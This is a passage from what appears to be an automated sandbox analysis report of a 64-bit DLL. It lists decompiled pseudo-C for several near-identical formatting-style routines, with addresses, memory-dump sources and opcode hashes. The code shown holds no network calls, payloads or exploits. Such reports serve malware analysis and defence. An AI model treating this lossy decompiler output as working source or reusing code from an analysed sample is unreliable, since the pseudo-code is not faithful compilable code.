                                                                      				if (_t118 == 0) goto 0x8001d578;
                                                                      				if (_t118 == 0) goto 0x8001d578;
                                                                      				if (_t118 == 0) goto 0x8001d578;
                                                                      				goto 0x8001d566;
                                                                      				_t129 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t129 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t129 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E00000001180013858( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, __rdx,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, __r8);
                                                                      				goto 0x8001d6f8;
                                                                      				 *((long long*)(_t133 + 0x18)) =  *((long long*)(_t133 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x8001d686;
                                                                      				_t149 =  *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8));
                                                                      				goto 0x8001d593;
                                                                      				goto 0x8001d593;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xfffffff7;
                                                                      				E0000000118001671C(_t133, _t133 + 0x50,  *((intOrPtr*)(_t133 + 0x30)), _t149,  *((intOrPtr*)(_t133 + 8)));
                                                                      				if (_t149 != 0) goto 0x8001d6ae;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t133 + 0x4c)) = 0;
                                                                      				r8b = bpl;
                                                                      				if (_t143 != 8) goto 0x8001d6c8;
                                                                      				E00000001180021A14(_t133, _t149);
                                                                      				goto 0x8001d6cf;
                                                                      				E00000001180020488( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8)), _t133, _t149);
                                                                      				if (0 == 0) goto 0x8001d6f6;
                                                                      				if ( *((intOrPtr*)(_t133 + 0x48)) == 0) goto 0x8001d6e8;
                                                                      				if ( *((char*)( *((intOrPtr*)(_t133 + 0x40)))) == 0x30) goto 0x8001d6f6;
                                                                      				 *((long long*)(_t133 + 0x40)) =  *((long long*)(_t133 + 0x40)) - 1;
                                                                      				 *((char*)( *((intOrPtr*)(_t133 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t133 + 0x48)) =  *((intOrPtr*)(_t133 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}














                                                                      0x18001d528
                                                                      0x18001d52d
                                                                      0x18001d532
                                                                      0x18001d53c
                                                                      0x18001d53f
                                                                      0x18001d542
                                                                      0x18001d545
                                                                      0x18001d548
                                                                      0x18001d54e
                                                                      0x18001d550
                                                                      0x18001d552
                                                                      0x18001d55b
                                                                      0x18001d564
                                                                      0x18001d569
                                                                      0x18001d572
                                                                      0x18001d578
                                                                      0x18001d580
                                                                      0x18001d59a
                                                                      0x18001d59f
                                                                      0x18001d5a7
                                                                      0x18001d5ae
                                                                      0x18001d5b4
                                                                      0x18001d5bb
                                                                      0x18001d5c8
                                                                      0x18001d5d8
                                                                      0x18001d5df
                                                                      0x18001d5e5
                                                                      0x18001d5ef
                                                                      0x18001d5f9
                                                                      0x18001d600
                                                                      0x18001d607
                                                                      0x18001d60d
                                                                      0x18001d612
                                                                      0x18001d61b
                                                                      0x18001d624
                                                                      0x18001d62a
                                                                      0x18001d62f
                                                                      0x18001d633
                                                                      0x18001d636
                                                                      0x18001d63d
                                                                      0x18001d641
                                                                      0x18001d64c
                                                                      0x18001d651
                                                                      0x18001d657
                                                                      0x18001d65e
                                                                      0x18001d66b
                                                                      0x18001d67b
                                                                      0x18001d67d
                                                                      0x18001d681
                                                                      0x18001d689
                                                                      0x18001d699
                                                                      0x18001d6a0
                                                                      0x18001d6a8
                                                                      0x18001d6aa
                                                                      0x18001d6ae
                                                                      0x18001d6b2
                                                                      0x18001d6bc
                                                                      0x18001d6c1
                                                                      0x18001d6c6
                                                                      0x18001d6ca
                                                                      0x18001d6d7
                                                                      0x18001d6dd
                                                                      0x18001d6e6
                                                                      0x18001d6e8
                                                                      0x18001d6f0
                                                                      0x18001d6f3
                                                                      0x18001d70c

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9f7e716a194fb443f441ab6e9ec3974d7ba7df35c1d852fb3d7d86f8768c60da
                                                                      • Instruction ID: f9e8c6cc9e6424f23bc967f3ef5c3d2cf37be11fc0c62b02937437d964ade371
                                                                      • Opcode Fuzzy Hash: 9f7e716a194fb443f441ab6e9ec3974d7ba7df35c1d852fb3d7d86f8768c60da
                                                                      • Instruction Fuzzy Hash: A9519E73614E1C82E7AA8F28C1543AC37A1E359B9CF25811AEF4917799CF35DE49C780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 71%
                                                                      			E0000000118001B724(void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r10, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t86;
                                                                      				signed int _t90;
                                                                      				void* _t110;
                                                                      				intOrPtr _t111;
                                                                      				signed int _t118;
                                                                      				intOrPtr _t129;
                                                                      				void* _t133;
                                                                      				void* _t143;
                                                                      				intOrPtr _t149;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t133 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t86 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t110 = _t86 - 5;
                                                                      				if (_t110 > 0) goto 0x8001b80b;
                                                                      				if (_t110 == 0) goto 0x8001b774;
                                                                      				_t111 = _t86;
                                                                      				if (_t111 == 0) goto 0x8001b85f;
                                                                      				if (_t111 == 0) goto 0x8001b7e3;
                                                                      				if (_t111 == 0) goto 0x8001b7bc;
                                                                      				if (_t111 == 0) goto 0x8001b85f;
                                                                      				if (_t86 - 0xffffffffffffffff != 1) goto 0x8001b82b;
                                                                      				_t90 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t143;
                                                                      				if ((_t90 >> 0x00000004 & 0x00000001) == 0) goto 0x8001b7a6;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001b7a6;
                                                                      				 *(__rcx + 0x28) = _t90 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001b88a;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x8001b8a1;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001b7dd;
                                                                      				goto 0x8001b78f;
                                                                      				goto 0x8001b78f;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t118 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t118 == 0) goto 0x8001b805;
                                                                      				goto 0x8001b78f;
                                                                      				goto 0x8001b78f;
                                                                      				if (_t118 == 0) goto 0x8001b774;
                                                                      				if (_t118 == 0) goto 0x8001b774;
                                                                      				if (_t118 == 0) goto 0x8001b774;
                                                                      				goto 0x8001b762;
                                                                      				_t129 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t129 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t129 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E00000001180013858( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, __rdx,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, __r8);
                                                                      				goto 0x8001b8f4;
                                                                      				 *((long long*)(_t133 + 0x18)) =  *((long long*)(_t133 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x8001b882;
                                                                      				_t149 =  *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8));
                                                                      				goto 0x8001b78f;
                                                                      				goto 0x8001b78f;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xfffffff7;
                                                                      				_t51 = _t133 + 0x50; // 0x91
                                                                      				E0000000118001671C(_t133, _t51,  *((intOrPtr*)(_t133 + 0x30)), _t149,  *((intOrPtr*)(_t133 + 8)));
                                                                      				if (_t149 != 0) goto 0x8001b8aa;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t133 + 0x4c)) = 0;
                                                                      				r8b = bpl;
                                                                      				if (_t143 != 8) goto 0x8001b8c4;
                                                                      				E00000001180021198(0, _t133, _t149);
                                                                      				goto 0x8001b8cb;
                                                                      				E0000000118001FC20( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8)), _t133);
                                                                      				if (0 == 0) goto 0x8001b8f2;
                                                                      				if ( *((intOrPtr*)(_t133 + 0x48)) == 0) goto 0x8001b8e4;
                                                                      				if ( *((char*)( *((intOrPtr*)(_t133 + 0x40)))) == 0x30) goto 0x8001b8f2;
                                                                      				 *((long long*)(_t133 + 0x40)) =  *((long long*)(_t133 + 0x40)) - 1;
                                                                      				 *((char*)( *((intOrPtr*)(_t133 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t133 + 0x48)) =  *((intOrPtr*)(_t133 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}














                                                                      0x18001b724
                                                                      0x18001b729
                                                                      0x18001b72e
                                                                      0x18001b738
                                                                      0x18001b73b
                                                                      0x18001b73e
                                                                      0x18001b741
                                                                      0x18001b744
                                                                      0x18001b74a
                                                                      0x18001b74c
                                                                      0x18001b74e
                                                                      0x18001b757
                                                                      0x18001b760
                                                                      0x18001b765
                                                                      0x18001b76e
                                                                      0x18001b774
                                                                      0x18001b77c
                                                                      0x18001b796
                                                                      0x18001b79b
                                                                      0x18001b7a3
                                                                      0x18001b7aa
                                                                      0x18001b7b0
                                                                      0x18001b7b7
                                                                      0x18001b7c4
                                                                      0x18001b7d4
                                                                      0x18001b7db
                                                                      0x18001b7e1
                                                                      0x18001b7eb
                                                                      0x18001b7f5
                                                                      0x18001b7fc
                                                                      0x18001b803
                                                                      0x18001b809
                                                                      0x18001b80e
                                                                      0x18001b817
                                                                      0x18001b820
                                                                      0x18001b826
                                                                      0x18001b82b
                                                                      0x18001b82f
                                                                      0x18001b832
                                                                      0x18001b839
                                                                      0x18001b83d
                                                                      0x18001b848
                                                                      0x18001b84d
                                                                      0x18001b853
                                                                      0x18001b85a
                                                                      0x18001b867
                                                                      0x18001b877
                                                                      0x18001b879
                                                                      0x18001b87d
                                                                      0x18001b885
                                                                      0x18001b895
                                                                      0x18001b898
                                                                      0x18001b89c
                                                                      0x18001b8a4
                                                                      0x18001b8a6
                                                                      0x18001b8aa
                                                                      0x18001b8ae
                                                                      0x18001b8b8
                                                                      0x18001b8bd
                                                                      0x18001b8c2
                                                                      0x18001b8c6
                                                                      0x18001b8d3
                                                                      0x18001b8d9
                                                                      0x18001b8e2
                                                                      0x18001b8e4
                                                                      0x18001b8ec
                                                                      0x18001b8ef
                                                                      0x18001b908

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ad6144f168a6ddc501a39d0c442554a9a35604a96ac9f53e6560d6537c720f87
                                                                      • Instruction ID: 5bc8733868b8ddf77a8b05a9ae2fce8e31201288e046637b023986401fe88087
                                                                      • Opcode Fuzzy Hash: ad6144f168a6ddc501a39d0c442554a9a35604a96ac9f53e6560d6537c720f87
                                                                      • Instruction Fuzzy Hash: 3751BE76604A5882E7AA9F28C1543BC27A8E798F98F248119EF45977D8CF21CE49C780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 71%
                                                                      			E0000000118001B90C(void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r10, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t86;
                                                                      				signed int _t90;
                                                                      				void* _t110;
                                                                      				intOrPtr _t111;
                                                                      				signed int _t118;
                                                                      				intOrPtr _t129;
                                                                      				void* _t133;
                                                                      				void* _t143;
                                                                      				intOrPtr _t149;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t133 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t86 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t110 = _t86 - 5;
                                                                      				if (_t110 > 0) goto 0x8001b9f3;
                                                                      				if (_t110 == 0) goto 0x8001b95c;
                                                                      				_t111 = _t86;
                                                                      				if (_t111 == 0) goto 0x8001ba47;
                                                                      				if (_t111 == 0) goto 0x8001b9cb;
                                                                      				if (_t111 == 0) goto 0x8001b9a4;
                                                                      				if (_t111 == 0) goto 0x8001ba47;
                                                                      				if (_t86 - 0xffffffffffffffff != 1) goto 0x8001ba13;
                                                                      				_t90 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t143;
                                                                      				if ((_t90 >> 0x00000004 & 0x00000001) == 0) goto 0x8001b98e;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001b98e;
                                                                      				 *(__rcx + 0x28) = _t90 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001ba72;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x8001ba89;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001b9c5;
                                                                      				goto 0x8001b977;
                                                                      				goto 0x8001b977;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t118 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t118 == 0) goto 0x8001b9ed;
                                                                      				goto 0x8001b977;
                                                                      				goto 0x8001b977;
                                                                      				if (_t118 == 0) goto 0x8001b95c;
                                                                      				if (_t118 == 0) goto 0x8001b95c;
                                                                      				if (_t118 == 0) goto 0x8001b95c;
                                                                      				goto 0x8001b94a;
                                                                      				_t129 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t129 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t129 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E00000001180013858( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, __rdx,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, __r8);
                                                                      				goto 0x8001badc;
                                                                      				 *((long long*)(_t133 + 0x18)) =  *((long long*)(_t133 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x8001ba6a;
                                                                      				_t149 =  *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8));
                                                                      				goto 0x8001b977;
                                                                      				goto 0x8001b977;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xfffffff7;
                                                                      				_t51 = _t133 + 0x50; // 0xc8
                                                                      				E0000000118001671C(_t133, _t51,  *((intOrPtr*)(_t133 + 0x30)), _t149,  *((intOrPtr*)(_t133 + 8)));
                                                                      				if (_t149 != 0) goto 0x8001ba92;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t133 + 0x4c)) = 0;
                                                                      				r8b = bpl;
                                                                      				if (_t143 != 8) goto 0x8001baac;
                                                                      				E00000001180021214(0, _t133, _t149);
                                                                      				goto 0x8001bab3;
                                                                      				E0000000118001FC9C( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8)), _t133);
                                                                      				if (0 == 0) goto 0x8001bada;
                                                                      				if ( *((intOrPtr*)(_t133 + 0x48)) == 0) goto 0x8001bacc;
                                                                      				if ( *((char*)( *((intOrPtr*)(_t133 + 0x40)))) == 0x30) goto 0x8001bada;
                                                                      				 *((long long*)(_t133 + 0x40)) =  *((long long*)(_t133 + 0x40)) - 1;
                                                                      				 *((char*)( *((intOrPtr*)(_t133 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t133 + 0x48)) =  *((intOrPtr*)(_t133 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}














                                                                      0x18001b90c
                                                                      0x18001b911
                                                                      0x18001b916
                                                                      0x18001b920
                                                                      0x18001b923
                                                                      0x18001b926
                                                                      0x18001b929
                                                                      0x18001b92c
                                                                      0x18001b932
                                                                      0x18001b934
                                                                      0x18001b936
                                                                      0x18001b93f
                                                                      0x18001b948
                                                                      0x18001b94d
                                                                      0x18001b956
                                                                      0x18001b95c
                                                                      0x18001b964
                                                                      0x18001b97e
                                                                      0x18001b983
                                                                      0x18001b98b
                                                                      0x18001b992
                                                                      0x18001b998
                                                                      0x18001b99f
                                                                      0x18001b9ac
                                                                      0x18001b9bc
                                                                      0x18001b9c3
                                                                      0x18001b9c9
                                                                      0x18001b9d3
                                                                      0x18001b9dd
                                                                      0x18001b9e4
                                                                      0x18001b9eb
                                                                      0x18001b9f1
                                                                      0x18001b9f6
                                                                      0x18001b9ff
                                                                      0x18001ba08
                                                                      0x18001ba0e
                                                                      0x18001ba13
                                                                      0x18001ba17
                                                                      0x18001ba1a
                                                                      0x18001ba21
                                                                      0x18001ba25
                                                                      0x18001ba30
                                                                      0x18001ba35
                                                                      0x18001ba3b
                                                                      0x18001ba42
                                                                      0x18001ba4f
                                                                      0x18001ba5f
                                                                      0x18001ba61
                                                                      0x18001ba65
                                                                      0x18001ba6d
                                                                      0x18001ba7d
                                                                      0x18001ba80
                                                                      0x18001ba84
                                                                      0x18001ba8c
                                                                      0x18001ba8e
                                                                      0x18001ba92
                                                                      0x18001ba96
                                                                      0x18001baa0
                                                                      0x18001baa5
                                                                      0x18001baaa
                                                                      0x18001baae
                                                                      0x18001babb
                                                                      0x18001bac1
                                                                      0x18001baca
                                                                      0x18001bacc
                                                                      0x18001bad4
                                                                      0x18001bad7
                                                                      0x18001baf0

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 40a2af439a3d6c2b84e300c81917fcf584cc8e18a1df0648db2a27fa49a359a4
                                                                      • Instruction ID: 7ee10069ed39be01f45c01059066882b892601eb10a81ae6136f1e5a27890046
                                                                      • Opcode Fuzzy Hash: 40a2af439a3d6c2b84e300c81917fcf584cc8e18a1df0648db2a27fa49a359a4
                                                                      • Instruction Fuzzy Hash: 5151CF73614E5882E7AA8F28C1543BC3BA4E759BD8F148109EF4997798CF35CE4AC780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 71%
                                                                      			E0000000118001BD20(void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r10, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t86;
                                                                      				signed int _t90;
                                                                      				void* _t110;
                                                                      				intOrPtr _t111;
                                                                      				signed int _t118;
                                                                      				intOrPtr _t129;
                                                                      				void* _t133;
                                                                      				void* _t143;
                                                                      				intOrPtr _t149;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t133 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t86 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t110 = _t86 - 5;
                                                                      				if (_t110 > 0) goto 0x8001be07;
                                                                      				if (_t110 == 0) goto 0x8001bd70;
                                                                      				_t111 = _t86;
                                                                      				if (_t111 == 0) goto 0x8001be5b;
                                                                      				if (_t111 == 0) goto 0x8001bddf;
                                                                      				if (_t111 == 0) goto 0x8001bdb8;
                                                                      				if (_t111 == 0) goto 0x8001be5b;
                                                                      				if (_t86 - 0xffffffffffffffff != 1) goto 0x8001be27;
                                                                      				_t90 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t143;
                                                                      				if ((_t90 >> 0x00000004 & 0x00000001) == 0) goto 0x8001bda2;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001bda2;
                                                                      				 *(__rcx + 0x28) = _t90 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001be86;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x8001be9d;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001bdd9;
                                                                      				goto 0x8001bd8b;
                                                                      				goto 0x8001bd8b;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t118 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t118 == 0) goto 0x8001be01;
                                                                      				goto 0x8001bd8b;
                                                                      				goto 0x8001bd8b;
                                                                      				if (_t118 == 0) goto 0x8001bd70;
                                                                      				if (_t118 == 0) goto 0x8001bd70;
                                                                      				if (_t118 == 0) goto 0x8001bd70;
                                                                      				goto 0x8001bd5e;
                                                                      				_t129 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t129 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t129 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E00000001180013858( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, __rdx,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, __r8);
                                                                      				goto 0x8001bef0;
                                                                      				 *((long long*)(_t133 + 0x18)) =  *((long long*)(_t133 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x8001be7e;
                                                                      				_t149 =  *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8));
                                                                      				goto 0x8001bd8b;
                                                                      				goto 0x8001bd8b;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xfffffff7;
                                                                      				_t51 = _t133 + 0x50; // 0xc8
                                                                      				E0000000118001671C(_t133, _t51,  *((intOrPtr*)(_t133 + 0x30)), _t149,  *((intOrPtr*)(_t133 + 8)));
                                                                      				if (_t149 != 0) goto 0x8001bea6;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t133 + 0x4c)) = 0;
                                                                      				r8b = bpl;
                                                                      				if (_t143 != 8) goto 0x8001bec0;
                                                                      				E0000000118002130C(0, _t133, _t149);
                                                                      				goto 0x8001bec7;
                                                                      				E0000000118001FD94( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8)), _t133);
                                                                      				if (0 == 0) goto 0x8001beee;
                                                                      				if ( *((intOrPtr*)(_t133 + 0x48)) == 0) goto 0x8001bee0;
                                                                      				if ( *((char*)( *((intOrPtr*)(_t133 + 0x40)))) == 0x30) goto 0x8001beee;
                                                                      				 *((long long*)(_t133 + 0x40)) =  *((long long*)(_t133 + 0x40)) - 1;
                                                                      				 *((char*)( *((intOrPtr*)(_t133 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t133 + 0x48)) =  *((intOrPtr*)(_t133 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}














                                                                      0x18001bd20
                                                                      0x18001bd25
                                                                      0x18001bd2a
                                                                      0x18001bd34
                                                                      0x18001bd37
                                                                      0x18001bd3a
                                                                      0x18001bd3d
                                                                      0x18001bd40
                                                                      0x18001bd46
                                                                      0x18001bd48
                                                                      0x18001bd4a
                                                                      0x18001bd53
                                                                      0x18001bd5c
                                                                      0x18001bd61
                                                                      0x18001bd6a
                                                                      0x18001bd70
                                                                      0x18001bd78
                                                                      0x18001bd92
                                                                      0x18001bd97
                                                                      0x18001bd9f
                                                                      0x18001bda6
                                                                      0x18001bdac
                                                                      0x18001bdb3
                                                                      0x18001bdc0
                                                                      0x18001bdd0
                                                                      0x18001bdd7
                                                                      0x18001bddd
                                                                      0x18001bde7
                                                                      0x18001bdf1
                                                                      0x18001bdf8
                                                                      0x18001bdff
                                                                      0x18001be05
                                                                      0x18001be0a
                                                                      0x18001be13
                                                                      0x18001be1c
                                                                      0x18001be22
                                                                      0x18001be27
                                                                      0x18001be2b
                                                                      0x18001be2e
                                                                      0x18001be35
                                                                      0x18001be39
                                                                      0x18001be44
                                                                      0x18001be49
                                                                      0x18001be4f
                                                                      0x18001be56
                                                                      0x18001be63
                                                                      0x18001be73
                                                                      0x18001be75
                                                                      0x18001be79
                                                                      0x18001be81
                                                                      0x18001be91
                                                                      0x18001be94
                                                                      0x18001be98
                                                                      0x18001bea0
                                                                      0x18001bea2
                                                                      0x18001bea6
                                                                      0x18001beaa
                                                                      0x18001beb4
                                                                      0x18001beb9
                                                                      0x18001bebe
                                                                      0x18001bec2
                                                                      0x18001becf
                                                                      0x18001bed5
                                                                      0x18001bede
                                                                      0x18001bee0
                                                                      0x18001bee8
                                                                      0x18001beeb
                                                                      0x18001bf04

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 716ad8316d6b2b976c2c37c6de18297ad8efcdc7f7de0b8cad2bcddf7e667c70
